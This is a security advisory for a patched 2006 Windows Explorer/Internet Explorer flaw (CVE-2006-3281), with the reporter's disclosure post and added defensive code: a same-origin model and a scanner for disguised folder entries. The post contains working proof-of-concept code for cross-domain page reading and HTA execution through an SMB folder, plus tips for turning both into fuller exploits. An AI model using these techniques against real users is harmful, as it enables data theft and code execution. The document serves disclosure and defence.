SecurityTracker.com
Category:   OS (Microsoft)  >   Windows Explorer Vendors:   Microsoft
Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications
SecurityTracker Alert ID:  1016388
SecurityTracker URL:  http://securitytracker.com/id/1016388
CVE Reference:   CVE-2006-3281
Updated:  Aug 8 2006
Original Entry Date:  Jun 27 2006
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2000 SP4, XP SP2, 2003 SP1; and prior service packs
Description:   A vulnerability was reported in Microsoft Windows Explorer. A remote user can read content from other web domains through the target user's browser. A remote user may be able to cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, reads content from a different domain. An <object> element whose data URL is on the attacker's own domain, but which answers with an HTTP Location redirect to another domain, is still treated as same-origin with the embedding page, so the page can read the redirected document through object.documentElement.outerHTML. In effect, the same-origin decision follows the URL that was requested rather than the URL the document was finally loaded from.
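The redirect-handling mistake described above, as an added example that is not part of the advisory or the reporter's post: a small model of the same-origin decision, with the vulnerable form (keyed on the requested URL) beside the corrected form (keyed on the URL of the final, non-redirect response). The host attacker.example, the redirect table, the extra relative hop and all function names are constructed for the demo; only the r.php?http://www.google.com/123456789 shape comes from the proof of concept.

```javascript
// Added example (not from the advisory or the reporter's post): models the
// same-origin decision that the outerHTML disclosure bypasses.  i.html embeds
// <object data="r.php?http://www.google.com/123456789">; r.php answers with
// "Location: http://www.google.com/123456789".  The object was requested from
// the attacker's origin but the document it ends up holding is Google's, and
// the vulnerable check keys on the requested URL instead of the final one.
// Host names, the redirect table and the helper names are constructed here.

// A Location header may be absolute or relative; it is resolved against the
// URL of the response that carried it (this is the step a naive check skips).
function resolveLocation(responseUrl, locationHeader) {
  return new URL(locationHeader, responseUrl).href;
}

// `responses` maps a URL to the Location header it answers with; a URL that
// is absent (or maps to undefined) is the final document.  Refuses loops and
// over-long chains so a malicious server cannot spin the client.
function followRedirects(startUrl, responses, maxHops = 20) {
  let current = new URL(startUrl).href;
  const seen = new Set([current]);
  for (let hop = 0; hop < maxHops; hop++) {
    const location = responses[current];
    if (location === undefined) return current;
    const next = resolveLocation(current, location);
    if (seen.has(next)) throw new Error('redirect loop at ' + next);
    seen.add(next);
    current = next;
  }
  throw new Error('too many redirects from ' + startUrl);
}

// Origin tuple: scheme, host and effective port.
function originOf(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return u.protocol + '//' + u.hostname + ':' + port;
}

// Vulnerable decision: loads the chain but compares the embedder against the
// URL that was *requested*, so a same-origin redirector launders any target.
function vulnerableMayReadDom(embedderUrl, objectDataUrl, responses) {
  followRedirects(objectDataUrl, responses); // document is loaded...
  return originOf(embedderUrl) === originOf(objectDataUrl); // ...but this ignores where from
}

// Fixed decision: the document's origin is that of the URL the final
// (non-redirect) response came from.
function fixedMayReadDom(embedderUrl, objectDataUrl, responses) {
  const finalUrl = followRedirects(objectDataUrl, responses);
  return originOf(embedderUrl) === originOf(finalUrl);
}

// Constructed reproduction of the PoC's shape.  attacker.example stands in for
// the server hosting i.html and r.php.
const EMBEDDER = 'http://attacker.example/i.html';
const OBJECT_DATA = 'http://attacker.example/r.php?http://www.google.com/123456789';
const RESPONSES = {
  [OBJECT_DATA]: 'http://www.google.com/123456789',        // r.php's redirect
  'http://www.google.com/123456789': '/accounts/login',      // relative hop (constructed)
  // 'http://www.google.com/accounts/login' is the final document
};

function demo() {
  return {
    finalUrl: followRedirects(OBJECT_DATA, RESPONSES),
    vulnerable: vulnerableMayReadDom(EMBEDDER, OBJECT_DATA, RESPONSES),
    fixed: fixedMayReadDom(EMBEDDER, OBJECT_DATA, RESPONSES),
    // A redirect that stays on the embedder's origin is still readable.
    sameOriginRedirect: fixedMayReadDom(EMBEDDER, 'http://attacker.example/old', {
      'http://attacker.example/old': '/new',
    }),
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The point to take from the model is that a redirect chain has to be resolved hop by hop (relative Location values included) and the origin assigned to the loaded document must come from the last hop; anything that records the origin before the fetch completes reproduces the bug.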

A remote user can create HTML that, when loaded by the target user, will cause an arbitrary HTA application to be executed on the target user's system. In the proof of concept, a folder on an SMB share (the reporter notes WebDAV would serve as well) is displayed inside an Internet Explorer frame; it contains an entry whose hidden extension is the CLSID of the HTML Application handler and whose visible name is a URL-encoded path traversal (%2e%2e%5cx, that is, ..\x). Double-clicking that entry makes MSHTA run the attacker's file from the parent folder, so the target user must double-click the disguised item.
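A scanner for the two tell-tales that the HTA proof of concept relies on, as an added example that is not the advisory's or the reporter's code: it splits off a CLSID extension the way Explorer hides it, percent-decodes the visible name, and reports entries whose decoded name escapes the listed folder or carries the HTML Application CLSID. The sample listing, the null-GUID entry and the single-decode resolution rule are constructed assumptions; the share path and the CLSID value come from the proof of concept.

```javascript
// Added example (not from the advisory or the reporter's post): flags the
// two tricks the HTA PoC combines when a folder is shown in an IE/Explorer
// folder view.  (1) An entry whose extension is a CLSID: Explorer hides the
// extension and hands the item to that handler, here the HTML Application
// handler (mshta).  (2) Percent-encoded characters in the visible name
// (%2e%2e%5cx is ..\x once decoded), so the item opened is not the item shown.
// The listing is constructed; "decode once, then resolve" is an assumption
// drawn from the PoC's %2e%2e%5cx -> ..\x behaviour.

const HTA_CLSID = '{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}'; // CLSID used in the PoC
const CLSID_EXT = /\.(\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\})$/i;

// "shown.name.{CLSID}" -> what Explorer displays and what it hides.
function splitClsidExtension(name) {
  const m = name.match(CLSID_EXT);
  return m ? { shown: name.slice(0, -m[0].length), ext: m[1] } : { shown: name, ext: null };
}

// Joins `folder` and `rel`, collapsing "." and ".." like a path walker and
// keeping the leading \\ of a UNC path.
function resolvePath(folder, rel) {
  const unc = folder.startsWith('\\\\') ? '\\\\' : '';
  const out = [];
  for (const p of (folder + '\\' + rel).split(/[\\\/]/)) {
    if (p === '..') out.pop();
    else if (p !== '' && p !== '.') out.push(p);
  }
  return unc + out.join('\\');
}

// Analyses one directory entry and lists the reasons it looks disguised.
function analyseEntry(folder, name) {
  const { shown, ext } = splitClsidExtension(name);
  let decoded;
  try { decoded = decodeURIComponent(shown); } catch (e) { decoded = shown; } // malformed %xx: keep as-is
  const base = resolvePath(folder, '');
  const resolved = resolvePath(folder, decoded);
  const isHta = !!ext && ext.toLowerCase() === HTA_CLSID;
  const reasons = [];
  if (isHta) reasons.push('extension is the HTML Application CLSID (opens under mshta)');
  else if (ext) reasons.push('hidden CLSID extension ' + ext);
  if (decoded !== shown) reasons.push('percent-encoded characters in the displayed name');
  if (/[\\\/]/.test(decoded)) reasons.push('decoded name contains a path separator');
  if (!resolved.toLowerCase().startsWith(base.toLowerCase() + '\\')) {
    reasons.push('decoded name resolves outside the listed folder');
  }
  // `target` is the path Explorer would actually open: decoded name plus the
  // hidden extension.
  return { name, shown, hta: isHta, target: resolved + (ext ? '.' + ext : ''), reasons };
}

function scanListing({ folder, entries }) {
  return entries.map((name) => analyseEntry(folder, name)).filter((f) => f.reasons.length > 0);
}

// Constructed listing of \\192.168.0.5\SmbPubRO\test laid out as in the PoC,
// plus benign entries and a non-HTA CLSID (the null GUID, constructed) for contrast.
const SAMPLE_LISTING = {
  folder: '\\\\192.168.0.5\\SmbPubRO\\test',
  entries: [
    'readme.txt',
    'photos',
    '%2e%2e%5cx.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}',
    'notes.{00000000-0000-0000-0000-000000000000}',
  ],
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanListing(SAMPLE_LISTING)) console.log(f);
}
```

Run against a directory listing pulled from a share or WebDAV folder, the PoC entry is reported with all four reasons and a target of \\192.168.0.5\SmbPubRO\x.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}, the file the double-click actually opens; the null-GUID entry is reported on the CLSID-extension reason alone, and plain files are not reported.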

Plebo Aesdi Nael reported this vulnerability.

[Editor's note: Microsoft indicates that the vulnerability is a Windows vulnerability that can be attacked via Internet Explorer.]

Impact:   A remote user can obtain information from an arbitrary domain.

A remote user can cause an arbitrary HTA application to be executed on the target user's system.

Solution:   The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=38cee83e-b17a-4c08-90ce-fb836b9615ad

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=6ef68858-4c91-47fb-ae34-0be556f10ede

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=50935f4e-e383-493e-97c6-599cbb2b87cc

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=759435a3-98f9-4115-b52e-d7fa9d024f16

Microsoft Windows Server 2003 for Itanium:

http://www.microsoft.com/downloads/details.aspx?FamilyId=462131c6-a728-4b3c-94de-85deccc42c3e

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=50eef5c5-861d-4802-85a2-6b0627aafc2a

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms06-045.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms06-045.mspx
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] IE_ONE_MINOR_ONE_MAJOR

text attached

Attachment: PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.asc (base64-decoded below)

REPORT NAME: PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR
DESTINATION: To Publish
EMAIL RECPT: bugtraq

CONTENTS
~~~~~~~~
0. IMPORTANT NOTICE
1. SUMMARY
2. READ CONTENT OF ANY DOMAIN - PROOF OF CONCEPT
3. READ CONTENT OF ANY DOMAIN - TIPS FOR MATURE EXPLOIT
4. DOUBLE-CLICK ANYWHERE ON WEB PAGE COULD ALLOW REMOTE CODE EXECUTION - PROOF OF CONCEPT
5. DOUBLE-CLICK ANYWHERE ON WEB PAGE COULD ALLOW REMOTE CODE EXECUTION - TIPS FOR MATURE EXPLOIT

0. IMPORTANT NOTICE
~~~~~~~~~~~~~~~~~~~
Copyright (c) 2006 Plebo Aesdi Nael
Permission is hereby granted for the redistribution of this document electronically.
It is not to be edited in any way without the express consent of Plebo Aesdi Nael.
Please email plebo@gmx.net for permission if you wish to reprint the whole or any part of this document in any other medium excluding electronic medium.

Plebo Aesdi Nael, plebo@gmx.net

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.0 (FreeBSD)

mQGiBELFR34RBAD0ZhPk2W6NkHbZObLX4b20fQA5A1HcxVX7nktxXn1CNPNZGwln
52Je7+nCvMC0kLlFPc2Mu52aL5G+WMNbPYnkXCsNxFAiscRYaIcMbw4PvB9CW21z
ZDX7Aq+RgCrgQXOF6FumXUgSGgokVEL0wGB6FWgDlE/t3apmaiNA+Et5YwCgqcf7
y1TTOijW91Y1GkghHYQon7ED/3SXsO8esEOax5cXEnKkGfyuWVVzxcOKSddFh6xB
OKLTazoEY3OpHqO6S+2q2wylBFVZqdM41NqTVRC5wQVlQEUo+b4qDoFfp7cWRUix
m8+ZbRRN6y8cazDCjnSjXI3GGwd3p00MhJUKevJIuRs6vvrEar2xWcXhuC/TZXPJ
bgAeBADsDM3TsSgE458gFLrTIayCTtjJp6OKNT4BmKZarCOfflnqlchOLY8PBsVH
flA5jyA8sPFsIoeIFkut7EYx0+8F2ym+oWShb7CVBEYItsh5UmtU2xNWmYoJOx/U
bB3PnJKdO3vCxkNseIu8LqHXE1qzkd43ocxx7cPgdREyquZAc7QgUGxlYm8gQWVz
ZGkgTmFlbCA8cGxlYm9AZ214Lm5ldD6IXQQTEQIAHgUCQsVHfgIbAwYLCQgHAwID
FQIDAxYCAQIeAQIXgAAKCRCtXEZ20jCHQSHUAJiVAuqU55hzf1rSgV2bNyBi71sR
AJwMf1orkD0wHd/jZknVAdkO9GHFv7kCDQRCxUecEAgAtrIc15i/g1W7s4IaIhn7
Z0k1V1hDjvrKQiIKb5Rz5ca7659INq4/wpu+pi1usqd3Zb53/ev2fcdYKzWYWd0G
dbwSJr8rdKSMr4yGzXoAVCWxjAH91TUeFVRtzQJILlI2C3lm59sQP1YRdMFC+9Le
y9Xcx9aSmezh7//xUCzIUJcxenmqXA2R+147aAlQD1BWKemCWEtMVc9Ueh+DclLG
tGiSDFBHMIdUT4mB0pFukWGwtOXNnXb8DfYyjfoGQoetcGRiWktQPBByLNToSLnF
H8CuT+zMQpvR6JXGKlttShRE0k3QAIlYfktw0loyzqFxglFjdQmI+/jUg0x5/npW
1wADBQf8CkAdF2ZBmzjvWrwfY7DSya8lnxU1JNhXeel+U7xnLt1zCAyUdiYS/jmC
PCC0ROaUl0uqwnGybi8UzPzuX2KKhfazNc1mzqJoorzDzEBJ5yMjf4YfbVdTKd5w
iOa5DUnDsEx8L1mrXhbRKQ+T/dvb/LOzfxBJrvJofFBAJUS/WEuiWNXPHVGQ2VnW
E8jOCf5LaMJXQ8kHZObuMiDazgubcg7MKKCtDSFyxMQL9LvzkdUq6aA60I1AKVv+
zLotUbcfkza5mIySL/QQGEd2N6hSCqo891kNas3bUt6E8BWlaLIuxSPAGe/GxzuZ
zjh3eOm/bsXKcJIyd8VuMjuzVxCct4hJBBgRAgAJBQJCxUecAhsMAAoJEK1cRnbS
MIdBaNoAoIhMnNOqw2wWJ4R7V1qjUCCQOTP/AJ9Ju97jTO8pL4y08wrUpZ+9V+Ek
0g==
=OV2E
-----END PGP PUBLIC KEY BLOCK-----

1. SUMMARY
~~~~~~~~~~
This document illustrates two issues found in Internet Explorer:
One is READ CONTENT OF ANY DOMAIN
Another is DOUBLE-CLICK ANYWHERE ON WEB PAGE COULD ALLOW REMOTE CODE EXECUTION

2. READ CONTENT OF ANY DOMAIN - PROOF OF CONCEPT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following proof of concept is an incomplete realization of the idea, to demonstrate its feasibility.
Windows Server 2003, Enterprise Edition, Service Pack 1, 15/06/2006

Upload the following files to a Web server and go to i.html
------------------------- i.html -------------------------
<html><body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object>
</body></html>
------------------------- r.php -------------------------
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?>

i.html displays the content of the Google Web page.

3. READ CONTENT OF ANY DOMAIN - TIPS FOR MATURE EXPLOIT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Target Google Desktop, similar to IE Design Flaw Lets Hacker Crack Google Desktop, http://www.eweek.com/article2/0,1895,1895579,00.asp
2. Target webmail

4. DOUBLE-CLICK ANYWHERE ON WEB PAGE COULD ALLOW REMOTE CODE EXECUTION - PROOF OF CONCEPT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following proof of concept is an incomplete realization of the idea, to demonstrate its feasibility.
Windows Server 2003, Enterprise Edition, Service Pack 1, 15/06/2006

Assume C:\SmbPubRO is shared over SMB as \\192.168.0.5\SmbPubRO
Run CMD, go to C:\SmbPubRO, and then enter the following command:
    mkdir test && cd test && mkdir %2e%2e%5cx.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B} && echo "<html><body><iframe width=300 height=300 src='./' ></iframe>" > test.html && cd .. && echo "<html><body><script>alert('hallo')</script>" > x.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}
Finally, open IE at \\192.168.0.5\SmbPubRO\test\test.html and double-click the icon labeled %2e%2e%5cx

MSHTA runs remote code.

5. DOUBLE-CLICK ANYWHERE ON WEB PAGE COULD ALLOW REMOTE CODE EXECUTION - TIPS FOR MATURE EXPLOIT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Use WebDAV, not SMB
2. Hide suspicious parts by CSS tricks similar to What A Drag! -revisited-, http://www.mikx.de/index.php?p=1
3. Set up a scenario for the double-click
4. If modified, able to compromise IE7BETA2
5. If modified, no need to double-click
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Copyright 2018, SecurityGlobal.net LLC